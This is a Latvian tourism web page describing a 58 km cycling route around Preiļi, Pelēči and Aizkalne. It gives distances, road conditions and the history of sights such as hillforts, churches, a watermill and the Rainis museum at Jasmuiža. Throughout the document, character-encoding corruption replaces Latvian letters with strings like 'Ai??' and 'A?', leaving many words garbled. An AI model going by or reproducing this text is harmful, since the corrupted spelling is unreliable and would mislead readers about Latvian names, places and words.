PreiA?i – PelAi??A?i – Aizkalne – PreiA?i | Dēkaiņi

PreiA?i – PelAi??A?i – Aizkalne – PreiA?i


PreiA?i – PelAi??A?i – Aizkalne – PreiA?i Print This Post

DabA? marA?rutam ir zaA?A? marAi??Ai??jums

PreiA?i-PelAi??A?i-Aizkalne-PreiA?i

 

Ai??im velomarA?rutam piedA?vA?jam trAi??s pamata variantus, kurus iespAi??jams savstarpAi??ji kombinAi??t. VelobraucAi??ji var izvAi??lAi??ties sev tAi??kamA?ko variantu saskaAi??A? ar savu fizisko sagatavotAi??bu, braucienam atvAi??lAi??to laiku un Ai??citiem apsvAi??rumiem.

 

Pirmais variants.

 

PreiA?i-ai???OA?u mA?jasai???-3 km

ai???OA?u mA?jasai???-pagrieziens uz KalvA?niem-10,5 km

Pagrieziens uz KalvA?niem-PelAi??A?u ezers-PelAi??A?i-4,5 km

PelAi??A?i-PelAi??A?u muiA?a-NAi??dermuiA?a-3,5 km

NAi??dermuiA?a-Krasnogorka-GrociA?ki-PelAi??A?u dzirnavas-GornejaA?i-9,5 km

GornejaA?i-ai???JA?Ai??iai???-MaskeviciA?ki (RumAi??lijas priede)-3,5 km

MaskeviciA?ki-ai???CerAi??basai???(SapAi??u namiAi??A?)-5 km

ai???CerAi??basai???-Aizkalne-KaA?emA?ki-Ai??Ai??epstu pilskalns-8 km

Ai??Ai??epstu pilskalns-Korsikova-Anspoki-PreiA?i-10,5 km

KOPAi??-58,0km

MarA?rutA? asfalta segums ir 31 km ceA?a, grants segums 15 km, uzlabots zemesceA?A? 5 km un zemesceA?A? 7 km. Reljefs pA?rsvarA? lAi??dzens; lielA?kais brauciens – kalnA? pie GornejaA?iem, lielA?kais nobrauciens – Anspokos uz PreiA?upes ieleju. ArAi?? lietainA? laikA? vai pAi??c lietus ceA?i ir labA? stA?voklAi?? un izbraucami bez problAi??mA?m.Ai?? PA?rvietojoties pa PreiA?u – Daugavpils un PreiA?u – Aglonas A?oseju, jA?uzmanA?s no satiksmes, seviA?Ai??i, ja iecerAi??ts ceA?ot kopA? ar bAi??rniem. IntensAi??vA?ka satiksme ir uz PreiA?u – Aglonas A?osejas. AtseviA?Ai??os marA?ruta posmos, vietA?s, kur tuvu ceA?iem atrodas lauku sAi??tas, jA?uzmanA?s no nepiesietajiem suAi??iem. TomAi??r te darbojas likums – jo mazA?ks suns, jo niknA?ks. MarA?ruts ir veicams vienas dienas laikA? jebkuram veselam cilvAi??kam, arAi?? bAi??rniem vecumA? no 10 gadiem. IepirkA?anA?s jA?plA?no PreiA?os, PelAi??A?os vai AizkalnAi??. PelAi??A?os un AizkalnAi?? varAi??s iegA?dA?ties tikai pA?rtiku un pirmA?s nepiecieA?amAi??bas preces. Ja nepiecieA?ams velosipAi??da remonts, tad bieA?A?k nepiecieA?amA?s detaA?as var iegA?dA?ties tikai PreiA?os. IespAi??jas baudAi??t sabiedriskA?s Ai??dinA?A?anas pakalpojumus ir tikai PreiA?os.

Ja ir jauks laiks un ir vAi??lme nopeldAi??ties, tad labA?kA?s peldvietas ir pie Limankas ezera un PelAi??A?u ezera D galA?, bet A?Ai?? iespAi??ja bAi??s jA?saskaAi??o ar zemes Ai??paA?niekiem. Publisku peldvietu A?ajA? marA?rutA? nav.

NakA?Ai??oA?anas iespAi??jas zem jumta un ar zinA?mu komfortu ir tikai PreiA?os. Telts vietu ir iespAi??jams atrast PelAi??A?u ezera krastA?, aiz KalvA?nu pilskalna. Ai??eit ir AS ai???Latvijas valsts meA?iai??? zemes Ai??paA?umi ar daA?A?m makA?Ai??ernieku atpAi??tas un ugunskuru vietA?m. Citur apmeA?anA?s ar teltAi??m ir jA?saskaAi??o ar zemes Ai??paA?niekiem.

MarA?rutA? kilometru atskaite sA?kas no PreiA?u centra. Dodamies pa Daugavpils ielu un tA?lA?k pa Daugavpils A?oseju D virzienA? uz PelAi??A?iem. Pirmo apskates objektu jau sasniedzam pAi??c 3 km. CeA?a norA?de A?osejas malA? informAi??, ka esam nonA?kuA?i pie ai???OA?u mA?jA?mai???, kuru saimnieki nodarbojas ar visai netradicionA?lu, Latgalei neraksturAi??gu un modernu lauksaimniecisko raA?oA?anu – vAi??ngliemeA?u audzAi??A?anu.

Atbraucot uz A?o vietu, jAi??s iepazAi??siet vAi??ngliemeA?u dzAi??vi, redzAi??siet vietu, kur tie aug, kA? arAi?? dzirdAi??siet saistoA?u saimnieka stA?stAi??jumu par A?Ai??m neparastajA?m radAi??bA?m. InteresantA?s ekskursijas noslAi??gumA? notiks arAi?? vAi??ngliemeA?u degustA?cija, izrA?dA?s, ka tos var pagatavot neskaitA?mos veidos. Pirms vizAi??tes ieraA?anA?s laiku vajadzAi??tu saskaAi??ot ar saimnieku Aini Noviku paAi?? telefonu 29443577. JA?rAi??Ai??inA?s, ka stA?stAi??jums un degustA?cija ilgs vismaz stundu.

 

TurpmA?kos 10,5 km varam baudAi??t Latgales ainavas lAi??dz kreisajA? pusAi?? pamanA?m nelielu ezeru un sakoptu sAi??tu tA? krastA?. Aiz A?Ai??s sAi??tas iebraucamA? ceA?a un autobusu pieturas ai???Novoseleai??? ir ceA?A?, kas pa kreisi ved meA?A?. Ai??eit mums ir jA?nogrieA?as un pAi??c neliela nobrauciena nonA?kam pie KalvA?nu vecticAi??bnieku kapiem. CeA?a kreisajA? pusAi?? labi apskatA?ms Limankas ezers.Ai??Limankas ezera vidAi??jais dziA?ums ir 2,5 m, maksimA?lais 4,1 m, bet platAi??ba sasniedz 12,7 ha.

 

 

 

 

KA? izrA?dA?s, KalvA?nu vecticAi??bnieku kapi ir ierAi??koti uz pilskalna. To savA? ekspedAi??cijA? 2008. gada novembrAi?? atklA?ja arheologa J. UrtA?na grupa. LAi??dz ar to, KalvA?nu pilskalns ir viens no jaunA?kajiem atklA?tajiem pilskalniem LatvijA?. Pilskalns atrodas zemes mAi??les galA?, kuru no trim pusAi??m ietver nogA?zAi?? mA?kslAi??gi izveidota terase, bet ceturtajA? pusAi?? no zemes mAi??les turpinA?juma senais nocietinA?jums nodalAi??ts ar mA?kslAi??gi veidotu valni un grA?vi. TA?dAi??jA?di norobeA?ota 80 x 45 m liela teritorija. NocietinA?jumu pastA?vAi??A?anas laikA? terasAi?? un uz vaA?Ai??a bija bijusi koka aizsargsiena. Pilskalns ierAi??kots nozAi??mAi??gA?, apkA?rtni kontrolAi??joA?A? vietA? – pA?rejA? starp Limankas un PelAi??A?u ezeriem. Tas varAi??tu bAi??t veidots kA? militA?rs nocietinA?jums. VecticAi??bnieku kapi A?eit ir ierAi??koti jau jaunA?kos laikos.

 

 

Uzreiz aiz kapiem-pilskalna grieA?amies pa labi un pa skaistu meA?a ceA?u gar PelAi??A?u ezera krastu dodamies PelAi??A?u virzienA?. PelAi??A?u ezera vidAi??jais un maksimA?lais dziA?ums ir tikai nedaudz lielA?ks par Limankas ezera – attiecAi??gi 2,7 m un 4,2 m, toties platAi??ba sasniedz 85,4 ha. DiemA?Ai??l posms gar ezeru nav garA?, un jau apmAi??ram pAi??c 1 km atkal nonA?kam uz Daugavpils A?osejas. BeidzotiesAi??meA?am, kreisajA? pusAi??, starp A?oseju un ezera krastu,Ai??atkal redzams PelAi??A?u ezers ar purvu.

 

 

 

 

Ai??is ir PelAi??A?u ezera purvs – dabas liegums, Natura 2000 teritorija. 12 ha lielais liegums ir dibinA?ts 1999. gadA? kA? nozAi??mAi??ga pA?rejas purvu un slAi??kA?Ai??u aizsardzAi??bas vieta (kas veidojas, aizaugot PelAi??A?u ezeram). Te aug retas vaskulA?ro augu un sAi??nu sugas.

PAi??c nepilna kilometra PelAi??A?u ezera D daA?A?, ceA?a labajA? pusAi??, aiz pamestajA?m mA?jA?m, atrodas RoA?monu senkapi (Vaidu kalns). AtseviA?Ai??a norA?de te gan nav uzstA?dAi??ta.

 

 

 

 

Iebraucot PelAi??A?os, pie veikala grieA?amies pa labi un braucam augA?A? nelielA? kalnA?. KreisajA?Ai??pusAi?? ir neliels meA?s – te atrodas BramaAi??u senkapi, par ko liecina arAi?? oriA?inA?la norA?de. PelAi??A?u centrA? ir apskatA?ma 2011. gadA? atklA?tA? politiski represAi??to piemiAi??as vieta. Turpinot braukt taisni, nonA?kam pie PelAi??A?u muiA?as. PAi??c RaiAi??a tAi??va KriA?jA?Ai??a PliekA?A?na nA?ves (1891. g.; apglabA?ts Daugavpils luterA?Ai??u kapos) RaiAi??a mA?te DA?rta un mA?sa LAi??ze PliekA?A?nes aizgA?ja no JasmuiA?as un no 1891. gada 13. februA?ra lAi??dz 1893. gada 3. aprAi??lim dzAi??voja PelAi??A?u muiA?A?, kuras rentnieks bija RaiAi??a labs paziAi??a un draugs JA?nis Puiga. PelAi??A?u muiA?A? savu atvaA?inA?jumu 1892. gadA? pavadAi??ja arAi?? Rainis.

 

 

 

PelAi??A?u muiA?as kungu mA?ja un klAi??ts ir kultAi??rvAi??sturiski objekti, kurus ieskauj 4,3 ha lielais PelAi??A?u muiA?as parks ar diviem dAi??Ai??iem un 12 eksotisko augu sugA?m. ParkA? ir apskatA?ms Ai??paA?i aizsargA?jamais dabas piemineklis – diA?koks – parastais osis, kura apkA?rtmAi??rs ir 3,6 m.

IepazinuA?i muiA?u, pa to paA?u ielu dodamies tA?lA?k un apmAi??ram pAi??c 600 m nonA?kam pie PreiA?i – Daugavpils A?osejas. Te, nogrieA?oties pa labi, dodamies uz NAi??dermuiA?u. NAi??dermuiA?as ievAi??rojamA?kais objekts ir Kunga JAi??zus ApskaidroA?anas Romas katoA?u baznAi??ca.

 

 

 

 

NAi??dermuiA?as pirmA? katoA?u koka baznAi??ca tika uzcelta 1748. gadA?, lai gan jau 1727. gada 22. aprAi??lAi?? Polijas karalis Augusts apstiprinA?ja Daugavpils katoA?u baznAi??cas privilAi??A?ijas uz NAi??dermuiA?u un uzdeva Daugavpils draudzei NAi??dermuiA?A? uzcelt jaunu baznAi??cu. 1875. gadA? to paplaA?inA?ja, bet 1892. gadA? restaurAi??ja. 1898. gadA? no tribuA?a izcAi??lA?s ugunsgrAi??ks un baznAi??ca nodega. Lai bAi??tu vieta dievkalpojumu noturAi??A?anai lAi??dz jaunas baznAi??cas uzbAi??vAi??A?anai, tika uzcelta neliela pagaidu koka kapela, kas atradA?s aiz paA?reizAi??jA?s baznAi??cas A?oga pretAi?? presbitAi??rijam.

PaA?reizAi??jA? mAi??ra baznAi??ca ir uzcelta 1901. gadA? prA?vesta JA?zepa AndA?ejevska vadAi??bA?. Cara laikA? prA?vests JA?zeps AndA?ejevskis bija cAi??nAi??tA?js par latvisku tautas izglAi??tAi??bu LatgalAi??.Ai?? BaznAi??ca celta par draudzes, Lietuvas un PAi??terburgas labvAi??A?u lAi??dzekA?iem. PrA?vests mira 1944. gadA?, un ir apglabA?ts baznAi??cas dA?rzA?. PaA?reizAi??jA?s baznAi??cas iekA?rta ir ievAi??rojami senA?ka par paA?u Ai??ku. Kokgriezumiem rotA?tais altA?ris ar altA?rgleznu ai???AuA?ras vA?rtu dievmA?teai??? ir atvests no Lietuvas. Valsts nozAi??mes mA?kslas piemineklis ir 18. gs. bAi??vAi??tA?s Ai??rA?eles.

2010. gadA?, pateicoties aktAi??vu un darboties griboA?u pagasta iedzAi??votA?ju iniciatAi??vai, pie baznAi??cas tika izveidota Ai??paA?a lAi??gA?anas vieta – RoA?ukroAi??a dA?rzs.

PAi??c baznAi??cas apskates A?Ai??Ai??rsojam PreiA?u – Daugavpils A?oseju un pa grants ceA?u dodamies A virzienA?. ApmAi??ram pAi??c 1 km A?Ai??Ai??rsojam Viragnes (VeirAi??gnas) upAi??ti, kas iztek no netA?lu esoA?A? VeirAi??gnas ezera. VAi??l apmAi??ram pAi??c 1,2 km nonA?kam ceA?u krustojumA? – mums jA?dodas pa kreisi lAi??dz lielceA?am PelAi??A?i – Ai??rdava. Ai??eit grieA?amies pa kreisi unAi?? pAi??c nepilniem 200 m pagrieA?amies uz PelAi??A?u – Aizkalnes ceA?a. NobraukuA?i pa A?o ceA?uAi?? 300 m, nogrieA?amies pa labi un braucam uz 1 km attA?lo DiA?koku taku.

 

 

Lai arAi?? pAi??dAi??jA? laikA? DiA?koku taka netiek apsaimniekota, tomAi??r to ir vAi??rts apmeklAi??t. Taka atrodas gleznainA? JaA?as upes krastA? pie GrociA?ku sA?dA?as, aizsargA?jamA? dabas lieguma teritorijA?Ai?? ai??zJaA?aai???, kas tika izveidots 2004. gadA?, lai saglabA?tu nogA?A?u un gravu meA?us, jo tie ir A?oti vAi??rtAi??gi dabisko meA?u biotopi. Dabas lieguma ai??zJaA?aai??? galvenA? sastA?vdaA?a ir JaA?as upe, gar kuru stiepjas aizsargA?jamo diA?koku taka. JaA?a ir dabiska upe ar akmeAi??u sakopojumiem upes gultnAi??. StA?vkrastu augstums sasniedz 40 metrus, un to nogA?zAi??s un gravA?s sastopami jaukti lapkoku meA?i, kur dominAi?? parastais osis un parastA? goba. DiA?koku takA? var ieraudzAi??t ne tikai diA?kokus, bet arAi?? astoAi??as aizsargA?jamA?s vaskulA?ro augu sugas ai??i?? laksis, spoA?ais suAi??burkA?Ai??is, Benekena zaAi??auza, lielA? raganzA?lAi??te, villainA? gundega. Specifisks mikroklimats JaA?as upes kanjonveidAi??gajA? gravA? ai??i?? paaugstinA?ts gaisa mitrums, ko papildina strauti un avoksnA?ji – nodroA?ina lielu epifAi??tisko sAi??nu, vA?rpstiAi??gliemeA?u un citu gliemju daudzveidAi??bu. DiA?koku takas garums ir 1,5 km.

PAi??c takas apmeklAi??juma atgrieA?amies uz PelAi??A?u – Ai??rdavas ceA?a un pa kreisi dodamies apskatAi??t PelAi??A?u Ai??densdzirnavas.

A?densdzirnavas bAi??vAi??tas 1899. gadA? JaA?as upes kreisajA? krastA?. A?densdzirnavu kompleksA? ietilpa pati dzirnavu Ai??ka, gateris ar nojumi (uzstA?dAi??ts 20. gs. 30. gados), kokapstrA?des darbnAi??ca, hidrobAi??ves, dzAi??vojamA? Ai??ka, kAi??ts. DarbojA?s arAi?? vilnas kA?rstuve ar pagrabu, kas nojaukta pAi??ckara gados, smAi??de un malAi??ju apmeA?anA?s vieta. DzirnavA?s bija 3 miltu maA?amie gaAi??A?i, 1 grAi??balotA?js, putraimu kapA?tA?js. MalA?anai tika izmantoti mA?kslAi??gi izlietie dzirnakmeAi??i. Dzirnavu agregA?ti izgatavoti ZviedrijA? un VA?cijA?.Ai?? LAi??dz 1928. gadam PelAi??A?u dzirnavas darbojA?s ar Ai??densratu. 1928. g. ielikta pirmA? turbAi??na (ar jaudu 76 Zs), 1963. g. uz PelAi??A?u dzirnavA?m pA?rvesta un uzstA?dAi??ta turbAi??na no Madonas rajona Aronas pagasta BirA?nu dzirnavA?m. MazAi??dens gadalaikos un turbAi??nu remonta laikA? dzirnavas darbinA?ja ar dAi??zeA?motoru, kas tika uzstA?dAi??ts 1970. gados. Gateri uzstA?dAi??ja 1930. gados. Dzirnavas darbojA?s lAi??dz 1990. gadiem. Tagad PelAi??A?u Ai??densdzirnavA?s uzstA?dAi??ta A?ehijA? raA?ota HES iekA?rta un kopA? 2000. gada 27. oktobra JaA?as Ai??deAi??i raA?o elektrAi??bu. Pie Ai??densdzirnavA?m, JaA?as gravA?, ir izveidots apmAi??ram 3 ha liels dzirnavezers, kas skaisti iekA?aujas kopAi??jA? ainavA?. A?densdzirnavu apmeklAi??jums ir jA?saskaAi??o ar Ai??paA?niekiem pa telefonu +37126027711.

ApskatAi??juA?i Ai??densdzirnavas, atgrieA?amies uz PelAi??A?u – Ai??rdavas lielceA?a un pa kreisi dodamies kalnA? uz nA?koA?o apskates objektu – GornejaA?u kapliA?u. LAi??dz objektam ir apmAi??ram 400 m, bet A?ajos 400 m paceA?amies augstA?k par 36 m. Kalna augstA?kajA? punktA? atrodas GornejaA?u kapi ar kapliA?u.

GornejaA?u (GornejieA?u, GornijaA?u, GornajaA?u, KalnajaA?u) kapliA?a celta 1788. g. pAi??c muiA?nieka Gizborta lAi??muma. Ai??ka ir astoAi??stAi??ru guA?bAi??ve, no A?rpuses apA?Ai??ta ar horizontA?liem dAi??A?iem (jauns dAi??A?u segums uzklA?ts 1999. gadA?), no iekA?puses ai??i?? ar vertikA?liem. 2001. gadA? kapliA?as sienas atbrAi??voja no kartona. KapliA?A? atrodas valsts nozAi??mes mA?kslas piemineklis ai??i?? savdabAi??gs altA?ris ar altA?rgaldu un tabernA?kulu. AltA?ris veidots siluetgriezumA?, un gleznojumam ir baroka stila iezAi??mes. Blakus kapliA?ai atrodas divi 19. gs. pirmajA? pusAi?? izgatavoti koka krucifiksi. PaA?laik A?is valsts nozAi??mes arhitektAi??ras piemineklis atrodas NAi??dermuiA?as katoA?u draudzes pA?rziAi??A?.

 

 

 

PAi??c apskates turpinA?m ceA?u Ai??rdavas virzienA? un pAi??c 1,2 km nogrieA?amies pa kreisi, un turpinA?m marA?rutu pa lauku ceA?u. VAi??l pAi??c apmAi??ram 1,5 km nonA?kam pie ceA?a krustojuma arAi??krucifiksu. Ai??eit atrodas ai??zJA?Ai??uai??? mA?jas un SIA ai???MD KA?reai??? mA?cAi??bu biA?u drava. NekA?du norA?A?u A?eit nav, tA?dAi??A? jA?seko kartei.

SIA ai???MD KA?reai??? piedA?vA? iepazAi??ties ar biA?u valstAi??bas noslAi??pumiem. Interesanta iepazAi??A?anA?s ar brAi??numiem un noslAi??pumiem biA?u saimes dzAi??vAi??. ApmeklAi??tA?jiem ir iespAi??ja ietAi??rpties speciA?los aizsargtAi??rpos un bitenieka vadAi??bA? iepazAi??ties ar dzAi??vas biA?u saimes smarA?u. JAi??su veselAi??bai un dzAi??vespriekam saimnieki piedA?vA? iegA?dA?ties medu, biA?u maizi, bet romantiskai noskaAi??ai – smarA?Ai??gas biA?u vaska svecAi??tes. ApmeklAi??jums jA?saskaAi??o ar saimniekiem pa telefonu +37128237502.

 

No ai???JA?Ai??uai??? krustojuma pAi??c apmAi??ram 450 m ir nA?koA?ais krustojums. Esam nonA?kuA?i pie Aizkalnes – Ai??rdavas ceA?a. Pie A?Ai?? krustojuma atrodas lauku sAi??ta, kuras pagalmA? var apskatAi??t Latvijai neraksturAi??gu koku – RumAi??lijas priedi.

RumAi??lijas priede jeb MaAi??edonijas priede-koks ar slaidu stumbru un nokareniem,sveAi??iem klA?tiem A?iekuriem, kas lAi??dzAi??gi egA?u A?iekuriem. SavvaA?A? sastopama BalkA?nu pussalA?.

 

 

 

 

AtgrieA?amies uz Aizkalnes – Ai??rdavas ceA?a un turpinA?m braucienu Aizkalnes virzienA?. PAi??c 600 m ceA?a labajA? pusAi??, starp ceA?u un JaA?as upi, atrodas MaskeviciA?ku senkapi-arheoloA?ijas piemineklis. AtseviA?Ai??a norA?de A?eit nav uzstA?dAi??ta. Turpat netA?lu, tikai JaA?as pretAi??jA? krastA?, atrodas cits arheoloA?ijas piemineklis – Feldhofas senkapi un apmetne.

VAi??l pAi??c 1,8 km A?Ai??Ai??rsojam nelielo Dzalbovkas upAi??ti un esam nonA?kuA?i Aizkalnes pagastA?. TurpinA?m braukt lAi??dz Aizkalne – Aglonas stacija ceA?a krustojumam. Te pagrieA?amies pa labi un dodamies garA?m A?Ai??Ai??nim lAi??dz pirmajai sAi??tai kreisajA? pusAi??. Te atrodas amatnieka StaAi??islava Geidas kokapstrA?des darbnAi??ca un ai???SapAi??u namiAi??A?ai???, par ko arAi?? liecina ceA?a norA?de.

 

ai???SapAi??u namiAi??A?ai??? ir amatnieka Ai??paA?i izveidots namiAi??A?, kurA? tiek eksponAi??ti viAi??a darinA?jumi – virpotie koka izstrA?dA?jumi – sveA?turi, cibas, mA?jsaimniecAi??bas priekA?meti, kurus iespAi??jams iegA?dA?ties. Ar StaAi??islavu Geidu iespAi??jams sazinA?ties pa telefonu +37129189021.

 

 

 

 

 

PAi??c ai???SapAi??u namiAi??aai??? apmeklAi??juma dodamies atpakaA? uz Aizkalni. MAi??su pirmais apskates objekts ir JasmuiA?as SvAi??tA? Krusta pagodinA?A?anas Romas katoA?u baznAi??ca. VietA?, kur atrodas tagadAi??jA? baznAi??ca, 1710. gadA? tika uzcelta pirmA? koka baznAi??ca, kura dAi??vAi??ta par Ai??rAi??dera muiA?as kapelu, jo muiA?a piederAi??ja Ai??rAi??deram. 1782. gadA? kA? JasmuiA?as Ai??paA?nieks minAi??ts Osips Ai??adurskis. 1815. gadA? ap A?o baznAi??cu muiA?kungs Ksaverijs Ai??adurskis uzcAi??la jaunu dievnamu, veltAi??tu SvAi??tA? Krusta paaugstinA?A?anas godam. Tas bija taisnstAi??rveida nams – 24 metrus garA?, 12 metrus plats. Uz pAi??lA?riem pie gala durvAi??m balstAi??jA?s lievenis, zem kura uz sienas bija uzgleznoti SvAi??tA? PAi??tera un SvAi??tA? PA?vila attAi??li. BaznAi??ca bija bez torAi??a. TA?da tA? pastA?vAi??ja lAi??dz 1926. gadam, kad prA?vesta Ostrovska darbAi??bas laikA? baznAi??cu nojauca, atstA?jot tikai mAi??rus, un sA?ka pA?rbAi??vi. Lai piebAi??vAi??tu kapelas, tika izlauztas sA?nu sienas 9 metru platumA?, vAi??lA?k katrA? sA?nA? izbAi??vAi??jot 9 metrus platu un 3 metrus garu kapelu. No priekA?puses dievnams tika pagarinA?ts par 6 metriem, virs pagarinA?juma uzliekot nelielu tornAi??ti. No iepriekA?Ai??jA?s baznAi??cas iekA?Ai??jA? iekA?rtojuma paturAi??ja tikai lielo altA?ri, divus biktskrAi??slus, skulptAi??ru un gleznu ar SvAi??tA? Jura attAi??lojumu, pA?rAi??jo inventA?ru iegA?dA?jA?s no jauna. ApkA?rt baznAi??cas dA?rzam ir laukakmeAi??u mAi??ra A?ogs un Ai??ieA?eA?u laukakmeAi??u vA?rti. BaznAi??cas priekA?A? ir piemiAi??as akmens politiski represAi??tajiem aizkalnieA?iem.

TA?lA?k dodamies uz blakus esoA?o Aizkalnes pareizticAi??go baznAi??cu. Aizkalnes pagasts pAi??c kultAi??ras un valodas ir latvisks. AizkalnieA?us pA?rvilkt pareizticAi??bA? un tA?dAi??jA?di vieglA?k pA?rkrievot bija iecerAi??juA?as krievu varas iestA?des un pareizticAi??gais krievu tirgotA?js Grigorijs KuzAi??ecovs, kurA? JasmuiA?u no Viktora Ai??adurska bija nopircis ap 1880. gadu. Ar krievu valdAi??bas, G. KuzAi??ecova un viAi??a dAi??la Ai??ikitas lAi??dzekA?iem 1904. gadA? tika uzcelta Aizkalnes pareizticAi??go baznAi??ca, kaut pareizticAi??go te bija pavisam maz. 1938. gadA? draudzAi?? bija 142 pareizticAi??gie, kas dzAi??voja tuvA?kA? un tA?lA?kA? apkaimAi??, pat lAi??dz 20 km tA?lu. BaznAi??ca izceA?as ar savu Ai??patnAi??jo Bizantijas stilu. BaznAi??cA? atrodas daudz vAi??rtAi??gu gleznu, altA?ris, gobelAi??ni un grA?matas, kA? arAi?? reliA?iskajA?s ceremonijA?s lietojamie priekA?meti, kuriem piemAi??t liela mA?kslas un kultAi??rvAi??sturiskA? vAi??rtAi??ba. LielA?kA? daA?a A?o priekA?metu ir 17. – 18. gs SanktpAi??terburgA? darinA?ti mA?kslas darbi.

 

Aizkalnes ievAi??rojamA?kais un pazAi??stamA?kais apskates objekts ir RaiAi??a muzejs ai???JasmuiA?aai???, kas izvietojies bijuA?ajA? JasmuiA?as muiA?A?. Kad RaiAi??a tAi??vs KriA?jA?nis PliekA?A?ns 1883. gadA? sA?ka saimniekot JasmuiA?A?, tA? atradA?s Vitebskas guberAi??as Daugavpils apriAi??Ai??Ai??, un muiA?as Ai??paA?nieks bija Dinaburgas 2. A?ildes tirgotA?js Grigorijs KuzAi??ecovs, no kura to nomA?ja K. PliekA?A?ns. PliekA?A?nu A?imene JasmuiA?A? nodzAi??voja lAi??dz 1891. gadam. KuzAi??ecovu dzimta JasmuiA?A? saimniekoja lAi??dz 1949. gadam.

No 1949. lAi??dz 1960. gadam JasmuiA?A? bija kolhoza “Rainis” kantoris, darbinieku dzAi??vokA?i, Aizkalnes ciema padome, muiA?as kAi??tAi??s atradA?s kolhoza zirgi un govis.
1964. gadA? JasmuiA?A? nodibinA?ts sabiedriskais muzejs, bet 1966. gadA? tas kA?uva par RaiAi??a LiteratAi??ras un mA?kslas vAi??stures muzeja (no 2001. gada ai??i?? VA RakstniecAi??bas, teA?tra un mAi??zikas muzeja) filiA?li.
JasmuiA?A? topoA?ais dzejnieks Rainis pavadAi??ja savas A?imnA?zista un studenta brAi??vdienas. Ai??ajA? posmA? Rainis ne tikai daudz lasAi??ja pasaules klasiAi??u darbus, bet arAi?? nopietnA?k pievAi??rsA?s dzejai, dramaturA?ijai, tulkoA?anai, rakstAi??ja dienasgrA?matu, kurA? atspoguA?ojas JA?Ai??a PliekA?A?na tA? brAi??A?a pretrunAi??gA?s izjAi??tas, sevis meklAi??jumi, kA? arAi?? PliekA?A?nu ikdiena un sadzAi??ve JasmuiA?as muiA?A?.

RekonstruAi??tajA? muiA?as pA?rvaldnieka dzAi??vojamajA? mA?jA? ierAi??kota ekspozAi??cija “RaiAi??a A?imnA?zijas un studiju gadi”. MuzejA? skatA?ma plaA?a Latgales keramikas ekspozAi??cija.
1974. gadA? no SilajA?Ai??u Ai??embeA?iem uz JasmuiA?u pA?rvesta un 1999. gadA? rekonstruAi??ta Latgales keramikas vecmeistara Andreja PaulA?na darbnAi??ca un ceplis, kur var iepazAi??t vidi un apstA?kA?us, kA?dos novada podnieki strA?dA?juA?i XIX gadsimta beigA?s un XX gadsimtA?. Te (noteiktos datumos) tiek demonstrAi??ts keramikas apdedzinA?A?anas process malkas ceplAi??.

JasmuiA?A? var baudAi??t Latgales novada krA?A?Ai??o dabu, pastaigA?joties pa seno muiA?as parku JaA?as upAi??tes krastos. Muzeja teritorijA? atrodas brAi??vdabas estrA?de, kur vasarA? notiek daA?A?di pasA?kumi: teA?tra izrA?des, koncerti, zaA?umballes.

PAi??c muzeja apmeklAi??juma dodamies pa ceA?u pA?ri JaA?as upAi??tei un nogrieA?amies pa kreisi. PAi??c 860 m, aiz bijuA?ajA?m darbnAi??cA?m, ceA?a kreisajA? pusAi??, ir lauku sAi??ta. Iepretim A?ai mA?jai ir vieta, kur bijaAi??uzstA?dAi??ta plA?ksne ar uzrakstu ai???Rainisai???. Par sava pseidonAi??ma Rainis vAi??sturi dzejnieks ap 1920. gadu savam biogrA?fam un kopoto rakstu sastA?dAi??tA?jam A. Birkertam pastA?stAi??jis sekojoA?o: ai???Mans pseidonAi??ms man atrasts gadus 25 atpakaA?. Man A?oti patika senlatvieA?u vA?rdi, latgalieA?os, kur es dzAi??voju jaunAi??bA?, es daudz tA?du dzirdAi??ju, no visiem man visvairA?k iepatikA?s A?is, kuru es lasAi??ju vienA? Latgales pagastA? uz ceA?a stabiAi??a, ar kA?diem mAi??dz apzAi??mAi??t zemniekiem taisA?mos lielceA?a gabalus. TA?tad redzat, ka mans vA?rds no lielceA?a uzlasAi??tsAi?? paA?A? neskartA?kajA? LatvijA?, un kas viAi??u nes tam arAi?? pa lielceA?iem jA?staigA?. Es to vA?rdu pieAi??Ai??mu, kad man bija jA?paraksta pirmA?s drukA?tA?s rindiAi??as un tA? man viAi??A? palicisai???.

Zemnieks Andrejs Rainis, kura uzvA?rdu JA?nis PliekA?A?ns izvAi??lAi??jA?s par savu paliekoA?o pseidonAi??mu, dzAi??voja JasmuiA?as pagasta ZeiliAi??os (tagad RuA?onas pag.), un viAi??am bija jA?labo lielceA?a JasmuiA?a-KastAi??re 0,5 lAi??dz 0,6 km garA? ceA?a posms, kas sA?kA?s pie A?Ai??m mA?jA?m un stiepA?s KastAi??res virzienA?.

Turpinot marA?rutu, pAi??c 670 m nonA?kam pie trAi??s ceA?u krustojuma. Pa labi ceA?A? ved uz KastAi??ri, bet pa kreisi uz Otrajiem VucA?niem, mums jA?dodas pa vidAi??jo ceA?u. PAi??c 4,3 km nonA?kam pie PreiA?u – Aglonas A?osejas. Iepretim, A?osejas pretAi??jA? pusAi??, atrodas izteiksmAi??gais Ai??Ai??epstu pilskalns.

Iegarenam maizes kukulim lAi??dzAi??gais, ziemeA?u dienvidu virzienA? orientAi??tais kalns ir 19 m augsts. TA? apkA?rtmAi??rs pakA?jAi?? ir 530 m, plakums ir apmAi??ram 80×60 m liels.Ai?? PAi??c veiktajiem izrakumiem un atrastajA?m mantA?m, pilskalns attiecinA?ms uz VIII-XII gs. Pilskalna nogA?A?u apakA?daA?a ir Ai??paA?i stA?va, izAi??emot dienvidu daA?u, kur pilskalna plakums lAi??zeni pA?riet nogA?zAi??. XIX gs. literatAi??rA? minAi??ts, ka pilskalns DR pusAi??Ai?? ir bijis aizsargA?ts ar grA?vjiem, no kuriem uz A pusi virzAi??tais grA?vis ir savienojies ar purvu. Starp grA?vjiem bijusi uzeja pilskalna plakumA?. LAi??dz mAi??su dienA?m nekas no A?iem veidojumiem nav saglabA?jies. Plakums un D nogA?ze tiek arti kopA? seniem laikiem, tA?dAi??A? dziA?ais melnais kultAi??rslA?nis, kas sedz kalna virspusi, ir sajaukts un lielA?koties noarts uz leju. Pilskalnu lielA? mAi??rA? postAi??juA?i arAi?? mantraA?i. VietAi??jie zemnieki kA?dam BogomoA?eca tAi??vam JaunA? muiA?A? nesuA?i pilskalnA? atrastA?s senlietas veselA?m pAi??tenAi??m. Latvijas VAi??stures muzejA? glabA?jas divi Ai??Ai??epstu pilskalnA? atrastie ovA?lie 5. gs. A?Ai??iltavakmeAi??i un vairA?kas citas senlietas. Ai??eit atrastA?s lietas glabA?jas arAi?? ViA?Ai??as muzejA?.

